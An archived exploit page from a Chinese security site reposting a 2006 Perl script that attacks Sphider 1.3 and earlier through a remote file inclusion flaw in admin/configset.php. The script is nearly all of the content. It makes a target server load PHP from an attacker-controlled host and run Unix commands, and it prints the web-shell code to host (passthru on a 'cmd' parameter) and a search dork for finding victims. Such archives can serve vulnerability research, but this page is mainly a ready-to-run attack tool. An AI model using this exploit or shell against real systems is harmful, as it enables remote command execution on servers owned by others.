首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sphider <= 1.3 (configset.php) Arbitrary Remote Inclusion Exploit
来源:http://retrogod.altervista.org 作者:rgod 发布时间:2006-04-14  

#!/usr/bin/perl
use IO::Socket;

print "\r\nSphider <= 1.3 arbitrary remote inclusion\r\n" ;
print "-> works with register_globals = On & allow_url_fopen = On\r\n";
print "by rgod rgod<AT>autistici<DOT>org\r\n";
print "site: http://retrogod.altervista.org\r\n";
print "\r\ndork: \"powered by sphider\"\r\n";

sub main::urlEncode {
my ($string) = @_;
$string =~ s/(\W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}

$serv=$ARGV[0];
$path=$ARGV[1];
$loc=urlEncode($ARGV[2]);
$cmd=""; for ($i=3; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 4)
{
print "\r\nUsage:\r\n";
print "perl sphider_xpl.pl server path location command\r\n\r\n";
print "server - Server where sphider is installed.\r\n";
print "path - Path to sphider (ex: /sphider/ or just /) \r\n";
print "location - a site with the code to include (without ending slash)\r\n";
print "command - a Unix command\r\n\r\n";
print "Example:\r\n";
print "perl sphider_xpl.pl localhost /sphider/ http://192.168.1.3 ls -la\r\n\r\n";
print "note: on http location you need this code in /conf.php/index.html :\r\n\r\n";
print "<?php\r\n";
print "ob_clean();\r\n";
print "if (get_magic_quotes_gpc())\r\n";
print "{\$_GET[\"cmd\"]=stripslashes(\$_GET[\"cmd\"]);}\r\n";
print "ini_set(\"max_execution_time\",0);\r\n";
print "echo 56789;\r\n";
print "passthru(\$_GET[\"cmd\"]);\r\n";
print "die;\r\n";
print "?>\r\n";
exit();
}
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10, PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host.\n\n";
print $sock "GET ".$path."admin/configset.php?cmd=".$cmd."&settings_dir=".$loc." HTTP/1.0\r\n";
print $sock "Host: ".$serv."\r\n";
print $sock "Connection: Close\r\n\r\n";
$out="";
while ($answer = <$sock>) {
$out.=$answer;
}
close($sock);
@temp= split /56789/,$out,2;
if ($#temp>0) {print "\r\nExploit succeeded...\r\n".$temp[1];exit();}
#if you are here...
print "\r\nExploit failed...\r\n";



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Ultr@VNC <= 1.0.1 client Lo
·PHP121 Instant Messenger <=
·Horde <= 3.0.9, 3.1.0 (Help
·Mozilla Firefox <= 1.5.0.1
·Simplog <= 0.9.2 (s) Remote
·vBulletin ImpEx <= 1.74 Rem
·ClansyS 1.1 (showid) Remote SQ
·Censtore <= 7.3.x (censtore
·phpBB <= 2.0.19 (user_sig_b
·quizz <= 1.01 (quizz.pl) Re
·Horde <= 3.0.9, 3.1.0 (Help
·panic-reloaded TCP Denial of S
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved